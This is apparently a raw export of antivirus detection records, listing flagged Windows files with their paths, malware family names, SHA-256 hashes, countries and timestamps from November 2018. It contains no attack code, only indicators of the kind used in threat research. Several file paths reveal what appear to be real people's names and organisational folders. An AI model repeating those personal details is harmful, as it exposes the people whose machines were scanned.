  Row(detection=Row(filename='chuuxwmr.exe', filepath='\\\\?\\C:\\Windows\\SysWOW64\\yefcbqzo\\chuuxwmr.exe', filesize=11840000, name='TR/Crypt.XPACK.Gen8.#M1.#R1'), hash='68d4f5505110d33eb906307722a519d8f479634aa928fb5a5d3f468db257ebb1', metadata=Row(cmdline=None, country='HR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:06:07Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='miner.exe', filepath='C:\\Users\\X\\Desktop\\Mining\\0.3.4b\\miner.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='csrss.exe', filepath='C:\\Documents and Settings\\X\\Application Data\\Microsoft\\WmiAppSrv\\csrss.exe', filesize=1344000, name='TR/Crypt.FKM.Gen.#M1.#R1'), hash='6f85c3cad16c4f9e490f240c57448bdd12310c0bc11f4f9231440daefe81237e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T01:22:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='69d1d191bce1095b1172de0e410288c21f9901d0ccfb9e4525135c1279a96e90', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\69D1D191BCE1095B1172DE0E410288C21F9901D0CCFB9E4525135C1279A96E90', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='69d1d191bce1095b1172de0e410288c21f9901d0ccfb9e4525135c1279a96e90', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:05:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='odawmda2mda=.bat', filepath='C:\\Users\\X\\Thunder Network\\Mini_downloadlib\\ODAwMDA2MDA=\\ODAwMDA2MDA=.bat', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='55685aaf75eebc41927a2e99221f4f25d786af0339148d83a3bf552f468f6532', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T08:22:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='idlemonitor.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\{DPQP8-MX9O8-3QDNT-MDW4T-YGBBS-GCNRV}\\idlemonitor.exe', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='KW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:26:31Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='trustedinstaller.exe', filepath='C:\\Temp\\TrustedInstaller.exe', filesize=192000, name='BDS/Androm.EB.73.#M0.#R0'), hash='5f17703ba5daa3a0d89ebcf8edc87f7035aac00d53945e9d0068ac46f5e267d6', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T09:56:35Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup_winthruster_2016.exe', filepath='F:\\Yeni klasör\\Downloads\\Programs\\Programs\\Setup_WinThruster_2016.exe', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T08:55:21Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='allfake.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\is-D5GS0.tmp\\AllFake.exe', filesize=1024000, name='Adware/CsdiMonetize.vgssx.#M1.#R1'), hash='2ca558499e6b9e872f4efe36145d1a52668b8e36f4eccad678575dad8d594f64', metadata=Row(cmdline=None, country='PG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T23:38:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='06284bbd4b929b6f36887d9b0049f6e9f1c4d2a0fdea515d6413b8bd6f0913a1', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-34\\06284BBD4B929B6F36887D9B0049F6E9F1C4D2A0FDEA515D6413B8BD6F0913A1', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='06284bbd4b929b6f36887d9b0049f6e9f1c4d2a0fdea515d6413b8bd6f0913a1', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:31:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-062556-a7d29d0c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_a8305edc\\AVSCAN-20181102-062538-A3ACBF16\\AVSCAN-20181102-062556-A7D29D0C', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:25:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='jettrim.exe', filepath='C:\\PROGRAM FILES (X86)\\JetAudio\\JetTrim.exe', filesize=640000, name='W32/Sality.AT.#M1.#R1'), hash='41cc6655f3bb5bf6cf7a66c22e39cebd2c6477bbf773ffbeda4ab408c27d8b28', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\SysWOW64\\mshta.exe', parentsize=13312, timestamp='2018-11-01T13:14:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='409.scr', filepath='F:\\New folder\\Corel Draw 12\\409\\409.scr', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:17:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='license.html', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\Adobe\\Adobe Photoshop CC 2015 (32 Bit)\\Legal\\sv_SE\\license.html', filesize=628000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='1561188c746c44610cf04361ea45baf35ee7dac2f655f3e40ba9a304525608f9', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T14:31:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='1de67c4b5e2a054de9b1f2e67856bf771939a0bda25c6b0fa17aaf433167f5c6', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-10.available\\Avira\\1DE67C4B5E2A054DE9B1F2E67856BF771939A0BDA25C6B0FA17AAF433167F5C6', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='1de67c4b5e2a054de9b1f2e67856bf771939a0bda25c6b0fa17aaf433167f5c6', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T07:23:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-01T13:46:13Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002910-63e9cdb1', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002910-63E9CDB1', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:29:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-214111-c01b078b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9c9b8cea\\AVSCAN-20181101-211938-33E69CE4\\AVSCAN-20181101-214111-C01B078B', filesize=148000, name='ADWARE/DealPly.Gen4.#M1.#R1'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T20:41:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.450\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='LB', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.450\\Setup.exe', parentsize=1551000, timestamp='2018-11-01T22:27:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='46ef34f9d42b62eeaca3c881301d20ff72f657063405d92665d028fe864e8870', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\46EF34F9D42B62EEACA3C881301D20FF72F657063405D92665D028FE864E8870', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='46ef34f9d42b62eeaca3c881301d20ff72f657063405d92665d028fe864e8870', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:05:03Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='st6unst.exe', filepath='D:\\MAIN CROFIL DOCS SERVER 2010\\BACK UP\\NENITA GARCIA FILES\\SSS-DIFF. COMPANY\\NELTEX SSS\\SSS2010\\NELTEX  AUG  . 2010\\ST6UNST.EXE', filesize=2240000, name='W32/Sality.AT.#M1.#R1'), hash='82539722f78d5a13c3136b280001f0f5f40b8e76d37f382e3ef1a8273c607cab', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T22:45:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-111013-5f4be73d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5b5741c0\\AVSCAN-20181101-111004-5D6D9563\\AVSCAN-20181101-111013-5F4BE73D', filesize=64000, name='TR/Agent.micws.#M1.#R1'), hash='604898f36af3c8a3ba421d9bf9b5c4156ac28127357a809aca38611edb5d6db9', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T03:10:17Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='yahoo! powered daret', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered daret', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='303277724f38609bceb633bcc00b942f5e87b0ce735fe749deaa91bf6183e822', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-01T06:16:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='416.exe', filepath='F:\\New folder\\Corel Draw 12\\416\\416.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline='rtp', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\SMADAV\\SMΔRTP.exe', parentsize=1613824, timestamp='2018-11-01T17:17:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='vwtester.exe', filepath='C:\\Users\\X\\Desktop\\Can Commander\\VWTester.exe', filesize=512000, name='TR/Crypt.ZPACK.Gen2.#M300.#R100871'), hash='5d15c8a10de097152559adebf4acac95b4b9b6fbc2fe0670157a1d57b05e38d9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-01T18:14:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0005456.exe', filepath='E:\\System Volume Information\\_restore{69212C0F-784E-4A08-A5CD-0319A60006C2}\\RP5\\A0005456.exe', filesize=384000, name='W64/Infector.Gen8.#M300.#R700674'), hash='0f9a635ea56c6dfb18d772a42012e15e0a17789a5fa9401a6ef68d7c682ce5c2', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:00:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='dealplylive.exe', filepath='\\\\?\\C:\\Program Files (x86)\\DealPlyLive\\Update\\DealPlyLive.exe', filesize=148000, name='ADWARE/DealPly.Gen4.#M300.#R300171'), hash='5f456982046db60202faa8a29d13eb84860f00a648b39919dded52111b130275', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T19:22:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181102-002419-44609d0f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-001743-196A0AE8\\AVSCAN-20181102-002419-44609D0F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:25Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='wwff.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\istE54F.tmp\\tools\\wwff.exe', filesize=624000, name='HEUR/AGEN.1011425.#M1.#R1'), hash='2cd623a10896ee766e9ff87a28b56b321d54742939917e1527270122069e1889', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:47:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-185523-0e234b19', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d81b71bd\\AVSCAN-20181101-185442-09D3E81B\\AVSCAN-20181101-185523-0E234B19', filesize=256000, name='TR/Dropper.Gen.#M1.#R1'), hash='216d36a242cafd0951935727d497baeffb715f17f5c665a9f89073814a7f4a0c', metadata=Row(cmdline=None, country='IR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T15:25:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182343-1c4cd1d4', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836b6955\\AVSCAN-20181101-182243-1213B2D6\\AVSCAN-20181101-182343-1C4CD1D4', filesize=2944000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='c76d46252236f45d25880eb78c70ba71eae66004af87257fc1541dcf6d680206', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:23:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='proteus 8_3sp2 .scr', filepath='H:\\Proteus 8_3sp2 .scr', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='d2b9fdf0d1a4944e826fda5c155f6555f02be753ca74269c381a7d992c106a10', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2871808, timestamp='2018-11-01T06:49:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cameriere nella ristorazione.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\MODULI ENGIM\\CORSI FORMAZIONE ADULTI\\ALIMENTARI\\CAMERIERE NELLA RISTORAZIONE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:11:18Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e1a116c9fbd312e290a010b2d498cf99efe2806d3bf13d253f1c15f16e040148', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_27.10.2018-17.available\\Avira\\E1A116C9FBD312E290A010B2D498CF99EFE2806D3BF13D253F1C15F16E040148', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='e1a116c9fbd312e290a010b2d498cf99efe2806d3bf13d253f1c15f16e040148', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-01T09:16:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-213125-303ffd0d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-213125-303FFD0D', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:31:48Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='registri riqualifica.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\chiavetta engim 2017\\STAGE 2016-2017\\PFI RIQUALIFICA 582581\\registri riqualifica.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-091008-cd285f58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_49cdd521\\AVSCAN-20181101-090958-CAB38C2B\\AVSCAN-20181101-091008-CD285F58', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:10:09Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='gnew folder .exe', filepath='\\?\\J:\\العاب\\Beetle.Bug.3\\New folder\\gNew folder .exe', filesize=832000, name='W32/Virut.Gen.#M1.#R1'), hash='8efcb1df9a7b33bca992cc7be4bca1c37dde38c6bc48da663ec1642e6f6d9fb8', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:45:34Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-191911-635ff96b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_d17cd884\\AVSCAN-20181101-191331-2ECEAC7B\\AVSCAN-20181101-191911-635FF96B', filesize=192000, name='Adware/AddLyrics.192000.14.#M1.#R1'), hash='e02c07e4a4366c426990e0ea7e32576860c092ba99c1a629f1c5512efc43dc5a', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T18:19:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-094746-24bf07d3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-094746-24BF07D3', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:47:53Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup337.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\qv2odj23405\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Glary Utilities 5\\Integrator.exe', parentsize=914896, timestamp='2018-11-01T20:14:43Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pruna alessia.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ENGIM\\ENGIM2014-2015\\engim varie\\STAGE 574309\\PRUNA ALESSIA.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:28:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-200157-a788268f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7dbb21c5\\AVSCAN-20181101-194844-54A3202F\\AVSCAN-20181101-200157-A788268F', filesize=812000, name='PUA/InstallCore.diur.#M1.#R1'), hash='e37acf04ba40222faa1d359bb4a0935bf97c6111e22dcd9c4d39d9c909cb558f', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T23:00:23Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-212744-102b527b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_de0729a5\\AVSCAN-20181101-211656-B20B1D6E\\AVSCAN-20181101-212744-102B527B', filesize=576000, name='TR/Dldr.Stantinko.be854f.#M1.#R1'), hash='be854f2a34ba3f398eb409c41f271270079bbd139e4bdd0f203b071e09ea0b3d', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T18:28:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='questionari.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\TESI MASTER\\master doc\\PER PROJECT WORK\\questionari.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:20:59Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='sandisk secureaccess.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\CHIAVETTA TESI\\SanDisk SecureAccess.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:19:38Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='situazioni scolastiche.exe', filepath='E:\\Didattica\\Sgb\\condivisa\\SORZI\\TUTTO STORICO\\ESAMI SETTEMBRE 2017\\ASA\\SITUAZIONI SCOLASTICHE.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='dbbba6122f8e506938da13a7b6a38c765c4600d8db1ef90d90e2c97600adb0b1', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:31:57Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cwysjoea.exe', filepath='G:\\Files are hidden by Trojan\\RECYCLER\\S-0-7-08-8026522526-7122263011-714661711-6462\\CWysjoea.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='bb6eff6c9655c890f0d38ddcffbed35c70e720cd1b4e90472e23ff251161108c', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-01T11:01:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='8ce8165e201c2d7c65f86abdff93485ff42062c7', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\2\\8ce8165e201c2d7c65f86abdff93485ff42062c7', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='b0be44e3f6f1e5838252466506f690235c61d4e7600899f09140e3e580521f3d', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T20:05:20Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-093559-9d59dad2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_318d9040\\AVSCAN-20181101-093330-80B14946\\AVSCAN-20181101-093559-9D59DAD2', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='d9d8fcfcdf53b63ec7a8dfd24a2086e31f8c19e146ac30e3af30e293c84fa17b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T02:36:06Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='autorun.exe', filepath='H:\\RECYCLER\\RECYCLER\\autorun.exe', filesize=64000, name='DR/PcClient.Gen.#M300.#R5075'), hash='e9bcb3cc0465caa5ab2050374d7d9267b25f231a9e1a83ad83bc2104f3decc6b', metadata=Row(cmdline='\\\\\\/start', country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\360\\360safe\\safemon\\360UDiskPro.exe', parentsize=1177672, timestamp='2018-11-01T09:16:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rundll32.exe', filepath='H:\\RUNDLL32.EXE', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='dc4940b65723ed334aa0f54c9152054c15e591d85e463f62aa076ba5516b23f9', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Baidu Security\\Baidu Antivirus\\5.4.3.124234.0\\BAVSvc.exe', parentsize=2572928, timestamp='2018-11-01T15:25:33Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='atu.exe', filepath='E:\\ATU.exe', filesize=1600000, name='TR/Patched.Ren.Gen4.#M300.#R300179'), hash='a9c1e2a015132b75d7ac1c7d38f524228e81ce54141a37eb44d7b3ba49ac70bd', metadata=Row(cmdline=None, country='GH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-04T13:56:27Z'), dt=datetime.date(2018, 11, 4)),
